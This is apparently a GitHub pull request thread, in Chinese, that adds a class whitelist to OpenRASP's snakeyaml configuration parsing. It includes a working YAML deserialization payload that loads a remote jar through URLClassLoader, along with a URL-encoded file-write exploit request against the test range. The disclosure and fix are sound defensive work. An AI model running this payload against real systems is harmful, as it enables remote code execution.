[Java] 添加yaml解析白名单类

[kkskk]

中文说明: 提交你的代码
snakeyaml没有做好类过滤, . 如果应用存在任意文件写漏洞, 可以直接写exp到rasp/conf/openrasp.yml下, openrasp会自动重新加载配置, 执行yml反序列, 然后导致RCE.
yml payload

'123': !!javax.script.ScriptEngineManager [!!java.net.URLClassLoader [[ !!java.net.URL ["http://127.0.0.1:2334/exp-8.jar"]]]]

可以直接拿openrasp-testcase作为靶场, 使用以下url即可让openrasp加载外部jar包
http://127.0.0.1:8080/vulns/005-file-write.jsp?filename=../../rasp/conf/openrasp.yml&filedata=%27123%27%3A%20%21%21javax.script.ScriptEngineManager%20%5B%21%21java.net.URLClassLoader%20%5B%5B%20%21%21java.net.URL%20%5B%22http%3A//127.0.0.1%3A2334/exp-8.jar%22%5D%5D%5D%5D

[CaledoniaProject]

whiteClass.add("java.util.Map");

还得加几个数组的类

[kkskk]

snakeyaml内置标量，列表，映射类型的构建，少了数组类应该也能运行，我本地测试了下配置功能没有问题

    public Constructor(TypeDescription theRoot, Collection<TypeDescription> moreTDs) {
        if (theRoot == null) {
            throw new NullPointerException("Root type must be provided.");
        }
        this.yamlConstructors.put(null, new ConstructYamlObject());
        if (!Object.class.equals(theRoot.getType())) {
            rootTag = new Tag(theRoot.getType());
        }
        yamlClassConstructors.put(NodeId.scalar, new ConstructScalar());
        yamlClassConstructors.put(NodeId.mapping, new ConstructMapping());
        yamlClassConstructors.put(NodeId.sequence, new ConstructSequence());
        addTypeDescription(theRoot);
        if (moreTDs != null) {
            for (TypeDescription td : moreTDs) {
                addTypeDescription(td);
            }
        }
    }

[CaledoniaProject]

会跟随 1.3.4 发布